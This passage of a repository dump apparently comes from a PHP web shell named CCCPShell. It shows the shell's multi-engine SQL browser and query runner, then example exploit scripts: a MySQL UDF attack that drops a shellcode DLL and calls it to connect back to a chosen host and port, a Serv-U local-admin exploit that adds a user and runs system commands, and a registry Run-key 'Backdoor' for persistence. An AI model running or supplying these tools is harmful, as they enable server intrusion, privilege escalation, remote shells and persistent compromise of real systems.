if(function_exists('mssql_close')) return mssql_close($con); 126 | else if(function_exists('sqlsrv_close')) return sqlsrv_close($con); 127 | } else if($type === 'pgsql') return pg_close($con); 128 | else if($type === 'oracle') return oci_close($con); 129 | else if($type === 'sqlite3') return $con->close(); 130 | else if($type === 'sqlite') return sqlite_close($con); 131 | else if($type === 'odbc') return odbc_close($con); 132 | else if($type === 'pdo') return $con = null; 133 | } 134 | 135 | /* 136 | function dump($table){ 137 | if (empty($table)) return 0; 138 | $this->dump = array(); 139 | $this->dump[0] = ''; 140 | $this->dump[1] = '-- --------------------------------------- '; 141 | $this->dump[2] = '-- Created: ' . date("d/m/Y H:i:s"); 142 | $this->dump[3] = '-- Database: ' . $this->base; 143 | $this->dump[4] = '-- Table: ' . $table; 144 | $this->dump[5] = '-- --------------------------------------- '; 145 | 146 | switch ($this->db){ 147 | case 'MySQL': 148 | $this->dump[0] = '-- MySQL dump'; 149 | if ($this->query('SHOW CREATE TABLE `' . $table . '`') != 1) return 0; 150 | if (! $this->get_result()) return 0; 151 | $this->dump[] = $this->rows[0]['Create Table']; 152 | $this->dump[] = '-- ------------------------------------- '; 153 | if ($this->query('SELECT * FROM `' . $table . '`') != 1) return 0; 154 | if (! $this->get_result()) return 0; 155 | for ($i = 0; $i < $this->num_rows; $i++){ 156 | foreach ($this->rows[$i] as $k => $v){ 157 | $this->rows[$i][$k] = @mysql_real_escape_string($v); 158 | } 159 | $this->dump[] = 'INSERT INTO `' . $table . '` (`' . @implode("`, `", $this->columns) . '`) VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');'; 160 | } 161 | break; 162 | case 'MSSQL': 163 | $this->dump[0] = '## MSSQL dump'; 164 | if ($this->query('SELECT * FROM ' . $table) != 1) return 0; 165 | if (! $this->get_result()) return 0; 166 | for ($i = 0; $i < $this->num_rows; $i++){ 167 | foreach ($this->rows[$i] as $k => $v){ 168 | $this->rows[$i][$k] = @addslashes($v); 169 | } 170 | $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');'; 171 | } 172 | break; 173 | case 'PostgreSQL': 174 | $this->dump[0] = '## PostgreSQL dump'; 175 | if ($this->query('SELECT * FROM ' . $table) != 1) return 0; 176 | if (! $this->get_result()) return 0; 177 | for ($i = 0; $i < $this->num_rows; $i++){ 178 | foreach ($this->rows[$i] as $k => $v){ 179 | $this->rows[$i][$k] = @addslashes($v); 180 | } 181 | $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');'; 182 | } 183 | break; 184 | case 'Oracle': 185 | $this->dump[0] = '## ORACLE dump'; 186 | $this->dump[] = '## under construction'; 187 | break; 188 | default: 189 | return 0; 190 | break; 191 | } 192 | 193 | return 1; 194 | } 195 | */ 196 | 197 | if (isset($p['code'])){ 198 | if (!isset($p['pg'])) $p['pg'] = 1; 199 | $start = ((int)$p['pg'] - 1) * $config['SQLLimit']; 200 | $oracleLimit = $start + $config['SQLLimit']; 201 | 202 | $sBuff = ''; 203 | $con = sql_connect($p['type'], $p['host'], $p['user'], $p['pass']); 204 | foreach(explode('{;}', $p['code']) as $query){ 205 | if (trim($query) !== ''){ 206 | $query = str_replace(array('{start}', '{limit}', '{oraclelimit}'), array($start, $config['SQLLimit'], $oracleLimit), $query); 207 | $sBuff .= '

' . tText('sq8', 'Executed') . ': ' . hsc($query) . ';  '; 208 | $res = sql_query($p['type'], $query, $con); 209 | if ($res !== false && !is_bool($res)){ 210 | $tmp = ""; 211 | 212 | $t = sql_num_fields($p['type'], $res, $con); 213 | for ($i = 0; $i < $t; $i++) 214 | $tmp .= ''; 215 | $tmp .= ''; 216 | 217 | $c = 0; 218 | 219 | while($rows = sql_fetch_data($p['type'], $res)){ 220 | $c++; 221 | $tmp .= ''; 222 | foreach($rows as $r) 223 | $tmp .= ''; 224 | $tmp .= ''; 225 | } 226 | 227 | $pag = genPaginator($p['pg'], ($c < $config['SQLLimit'] ? $p['pg'] : -1), false) . ''; 228 | $sBuff .= "[ ok ]


{$pag}
{$tmp}
' . @hsc(sql_field_name($p['type'], $res, $i)) . '
' . @hsc($r) . '

{$pag}
"; 229 | unset($c, $tmp); 230 | } else if ($res === false) 231 | $sBuff .= "[ ERROR ] ({$res})


"; 232 | else 233 | $sBuff .= "[ ok ] ({$res})


"; 234 | } 235 | } 236 | 237 | sAjax($sBuff); 238 | } else if (isset($p['host'])){ 239 | $con = sql_connect($p['type'], $p['host'], $p['user'], $p['pass']); 240 | if ($con !== false){ 241 | $sBuff .= '
' . 242 | mHide('me', 'sql') . mHide('type', $p['type']) . 243 | mHide('host', $p['host']) . mHide('port', $p['port']) . 244 | mHide('user', $p['user']) . mHide('pass', $p['pass']) . ' 245 |
246 |

' . mSubmit(tText('go', 'Go!'), 'dbexec(euc(d.getElementById("code").value))') . '   247 | ' . tText('sq4', 'Separate multiple commands with') . ' {;} ' . tText('sq9', 'Variables for use in pagination') . ' {start}, {limit}, {oraclelimit}


248 | 249 | 292 | 293 |
'; 250 | 251 | if (($p['type']!=='pdo') && ($p['type']!=='odbc')){ 252 | if ($p['type']==='mssql') $showdb = 'SELECT name FROM master..sysdatabases'; 253 | else if ($p['type']==='pgsql') $showdb = 'SELECT schema_name FROM information_schema.schemata'; 254 | else if ($p['type']==='oracle') $showdb = 'SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME'; 255 | else if ($p['type']==='sqlite' || $p['type']==='sqlite3') $showdb = "SELECT '{$p['host']}'"; 256 | else $showdb = 'SHOW DATABASES'; //mysql 257 | 258 | $res = sql_query($p['type'], $showdb, $con); 259 | if ($res !== false){ 260 | $bg = 0; 261 | while($rowarr = sql_fetch_data($p['type'], $res)){ 262 | foreach($rowarr as $rows){ 263 | $sBuff .= '

'.$rows.'

'; 264 | 265 | if($p['type']==='mssql') $showtbl = "SELECT name FROM {$rows}..sysobjects WHERE xtype = 'U'"; 266 | else if($p['type']==='pgsql') $showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='{$rows}'"; 267 | else if($p['type']==='oracle') $showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='{$rows}'"; 268 | else if($p['type']==='sqlite' || $p['type']==='sqlite3') $showtbl = "SELECT name FROM sqlite_master WHERE type='table'"; 269 | else $showtbl = "SHOW TABLES FROM {$rows}"; //mysql 270 | 271 | $res_t = sql_query($p['type'], $showtbl, $con); 272 | if ($res_t != false){ 273 | while($tablearr = sql_fetch_data($p['type'], $res_t)){ 274 | foreach($tablearr as $tables){ 275 | if ($p['type']==='mssql') $dumptbl = "SELECT TOP 100 * FROM {$rows}..{$tables}"; //TODO 276 | else if ($p['type']==='pgsql') $dumptbl = "SELECT * FROM {$rows}.{$tables} LIMIT {limit} OFFSET {start}"; 277 | else if ($p['type']==='oracle') $dumptbl = "SELECT * FROM {$rows}.{$tables} WHERE ROWNUM BETWEEN {start} AND (oraclelimit);"; 278 | else if ($p['type']==='sqlite' || $p['type']==='sqlite3') $dumptbl = "SELECT * FROM {$tables} LIMIT {start}, {limit}"; 279 | else $dumptbl = "SELECT * FROM {$rows}.{$tables} LIMIT {start}, {limit}"; //mysql 280 | 281 | $sBuff .= ''; 282 | } 283 | } 284 | } 285 | $sBuff .= '
' . $tables . '
'; 286 | } 287 | } 288 | } 289 | } 290 | 291 | $sBuff .= '
'; 294 | if (isset($p['sqlinit'])) $sBuff .= mHide('jseval', 'dbhistory("s");'); 295 | 296 | sql_close($p['type'], $con); 297 | } else 298 | $sBuff .= sDialog('Unable to connect to database'); 299 | } else { 300 | $sqllist = array(); 301 | if (function_exists('mysql_connect') || function_exists('mysqli_connect')) $sqllist['mysql'] = 'MySQL [using mysql_* or mysqli_*]'; 302 | if (function_exists('mssql_connect') || function_exists('sqlsrv_connect')) $sqllist['mssql'] = 'MsSQL [using mssql_* or sqlsrv_*]'; 303 | if (function_exists('pg_connect')) $sqllist['pgsql'] = 'PostgreSQL [using pg_*]'; 304 | if (function_exists('oci_connect]')) $sqllist['oracle'] = 'Oracle [using oci_*]'; 305 | if (function_exists('sqlite_open')) $sqllist['sqlite'] = 'SQLite [using sqlite_*]'; 306 | if (class_exists('SQLite3')) $sqllist['sqlite3'] = 'SQLite3 [using class SQLite3]'; 307 | if (function_exists('odbc_connect')) $sqllist['odbc'] = 'ODBC [using odbc_*]'; 308 | if (class_exists('PDO')) $sqllist['pdo'] = 'PDO [using class PDO]'; 309 | 310 | $sBuff .= ' 311 |
312 |
313 |

' . tText('sql', 'SQL') . '

314 |
315 |
316 |
' . 317 | mInput('host', 'localhost', '' . tText('sq7', 'Host') . '', 1, '', 'style="width: 99%;"') . 318 | '' . mInput('user', '', tText('sq0', 'Username'), 1, '', 'style="width: 99%;"') . '' . 319 | '' . mInput('pass', '', tText('sq1', 'Password'), 1, '', 'style="width: 99%;"') . '' . 320 | '' . mInput('port', '', tText('sq2', 'Port (optional)'), 1, '', 'style="width: 99%;"') . '' . 321 | mSelect('type', $sqllist, false, false, 'dbengine(this)', tText('sq3', 'Engine')) . 322 | mHide('me', 'sql') . mHide('sqlinit', 'init') . mHide('jseval', 'dbengine(d.getElementById("type"));dbhistory("v");') . 323 | '
' . mSubmit(tText('go', 'Go!'), 'ajaxLoad(serialize(d.forms[0]));', 1) . '
' . 324 | '

Or use www.adminer.org
325 |
'; 326 | } -------------------------------------------------------------------------------- /examples/mysql_exploit_example.php: -------------------------------------------------------------------------------- 1 | Connected successfully as root

"; 23 | 24 | $query = "select myconnect('$chost','$cport');"; 25 | $result = mysql_query($query, $link); 26 | if ($result){ 27 | echo '

'.$query.' ----- Success

'; 28 | sleep(1); 29 | mysql_close($link); 30 | exit; 31 | } 32 | 33 | echo "

selecting db for DLl ----- "; 34 | $result=mysql_select_db($gt_db); 35 | if (!$result) { 36 | echo 'Failed

'; 37 | echo '

greating db for DLl ----- '.(mysql_create_db($gt_db, $link) ? 'Success' : 'Failed').'

'; 38 | echo '

selecting db for DLl ----- '.(mysql_select_db($gt_db, $link) ? 'Success' : 'Failed').'

'; 39 | } else { 40 | echo 'Success

'; 41 | } 42 | 43 | $query="CREATE TABLE blob_tab (blob_col BLOB);"; 44 | echo '

'.$query.' ----- '.(mysql_query($query, $link) ? 'Success' : 'Failed'); 45 | 46 | echo '

Inserting blob table for Dll ----- '.(mysql_query("INSERT into blob_tab values (CONVERT($shellcode,CHAR));", $link) ? 'Success' : 'Failed').'

'; 47 | 48 | echo '

Dumping Dll in c:/kaka.dll ----- '.(mysql_query("SELECT blob_col FROM blob_tab INTO DUMPFILE 'c:/kaka.dll';", $link) ? 'Success' : 'Failed').'

'; 49 | 50 | echo '

Drop table name ----- '.(mysql_query("drop table blob_tab", $link) ? 'Success' : 'Failed').'

'; 51 | 52 | 53 | $query="create function myconnect returns integer soname 'c:\\kaka.dll';"; 54 | echo '

'.$query.' ----- '.(mysql_query($query, $link) ? 'Success' : 'Failed').'

'; 55 | 56 | echo "

Start connecting $chost:$cport .....".(mysql_query("select myconnect('$chost','$cport');", $link) ? 'Success' : 'Failed').'

'; 57 | 58 | sleep(1); 59 | mysql_close($link); 60 | ?> -------------------------------------------------------------------------------- /examples/serv-u_exploit_example.php: -------------------------------------------------------------------------------- 1 | Recv: $recvbuf
"; 72 | $sendbuf = "USER ".$suuser."\r\n"; 73 | fputs($sock, $sendbuf, strlen($sendbuf)); 74 | echo "Send: $sendbuf
"; 75 | $recvbuf = fgets($sock, 1024); 76 | echo "Recv: $recvbuf
"; 77 | $sendbuf = "PASS ".$supass."\r\n"; 78 | fputs($sock, $sendbuf, strlen($sendbuf)); 79 | echo "Send: $sendbuf
"; 80 | $recvbuf = fgets($sock, 1024); 81 | echo "Recv: $recvbuf
"; 82 | $sendbuf = "SITE MAINTENANCE\r\n"; 83 | fputs($sock, $sendbuf, strlen($sendbuf)); 84 | echo "Send: $sendbuf
"; 85 | $recvbuf = fgets($sock, 1024); 86 | echo "Recv: $recvbuf
"; 87 | $sendbuf = $domain; 88 | fputs($sock, $sendbuf, strlen($sendbuf)); 89 | echo "Send: $sendbuf
"; 90 | $recvbuf = fgets($sock, 1024); 91 | echo "Recv: $recvbuf
"; 92 | $sendbuf = $adduser; 93 | fputs($sock, $sendbuf, strlen($sendbuf)); 94 | echo "Send: $sendbuf
"; 95 | $recvbuf = fgets($sock, 1024); 96 | echo "Recv: $recvbuf
"; 97 | echo "**********************************************************
"; 98 | if($job!='adduser'){ 99 | echo "Starting Exploit ...
"; 100 | echo "**********************************************************
"; 101 | $exp = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10); 102 | $recvbuf = fgets($exp, 1024); 103 | echo "Recv: $recvbuf
"; 104 | $sendbuf = "USER ".$username."\r\n"; 105 | fputs($exp, $sendbuf, strlen($sendbuf)); 106 | echo "Send: $sendbuf
"; 107 | $recvbuf = fgets($exp, 1024); 108 | echo "Recv: $recvbuf
"; 109 | $sendbuf = "PASS ".$password."\r\n"; 110 | fputs($exp, $sendbuf, strlen($sendbuf)); 111 | echo "Send: $sendbuf
"; 112 | $recvbuf = fgets($exp, 1024); 113 | echo "Recv: $recvbuf
"; 114 | $sendbuf = "site exec ".$sucommand."\r\n"; 115 | fputs($exp, $sendbuf, strlen($sendbuf)); 116 | echo "Send: site exec ".$sucommand."
"; 117 | $recvbuf = fgets($exp, 1024); 118 | echo "Recv: $recvbuf
"; 119 | echo "**********************************************************
"; 120 | echo "Starting Delete Domain ...
"; 121 | echo "**********************************************************
"; 122 | $sendbuf = $deldomain; 123 | fputs($sock, $sendbuf, strlen($sendbuf)); 124 | echo "Send: $sendbuf
"; 125 | $recvbuf = fgets($sock, 1024); 126 | echo "Recv: $recvbuf
"; 127 | }else{ 128 | echo "All done ...
"; 129 | echo "**********************************************************
"; 130 | } 131 | fclose($sock); 132 | if($job!='adduser') fclose($exp); 133 | 134 | ?> -------------------------------------------------------------------------------- /examples/windows_registry.php: -------------------------------------------------------------------------------- 1 | RegRead($regkey)); 15 | 16 | 17 | 18 | 19 | /************************************* 20 | 21 | Windows registry delete 22 | 23 | *************************************/ 24 | 25 | // KEY 26 | $regkey = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor'; 27 | 28 | $shell= new COM('WScript.Shell'); 29 | 30 | echo 'Delete registry '.(!$shell->RegDelete($regkey) ? 'success' : 'failed'); 31 | 32 | 33 | 34 | 35 | /************************************* 36 | 37 | Windows registry write 38 | 39 | *************************************/ 40 | 41 | // KEY 42 | $regkey = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor'; 43 | 44 | $regtype = 'REG_SZ'; 45 | 46 | // VALUE 47 | $regval = 'c:\windows\backdoor.exe'; 48 | 49 | $shell= new COM('WScript.Shell'); 50 | 51 | $a = $shell->RegWrite($regkey, $regval, $regtype); 52 | 53 | echo 'Write registry '.(!$a ? 'success' : 'failed'); 54 | -------------------------------------------------------------------------------- /misc/687474703a2f2f6935392e74696e797069632e636f6d2f32696b776d6d612e6a7067.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6935392e74696e797069632e636f6d2f32696b776d6d612e6a7067.jpg -------------------------------------------------------------------------------- /misc/687474703a2f2f6935392e74696e797069632e636f6d2f6663327a32762e6a7067.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6935392e74696e797069632e636f6d2f6663327a32762e6a7067.jpg -------------------------------------------------------------------------------- /misc/687474703a2f2f6936302e74696e797069632e636f6d2f726c7a316f6c2e6a7067.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6936302e74696e797069632e636f6d2f726c7a316f6c2e6a7067.jpg -------------------------------------------------------------------------------- /misc/687474703a2f2f6936322e74696e797069632e636f6d2f327a35353363382e6a7067.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6936322e74696e797069632e636f6d2f327a35353363382e6a7067.jpg -------------------------------------------------------------------------------- /misc/diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/diagram.png -------------------------------------------------------------------------------- /misc/diagram.psd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/diagram.psd --------------------------------------------------------------------------------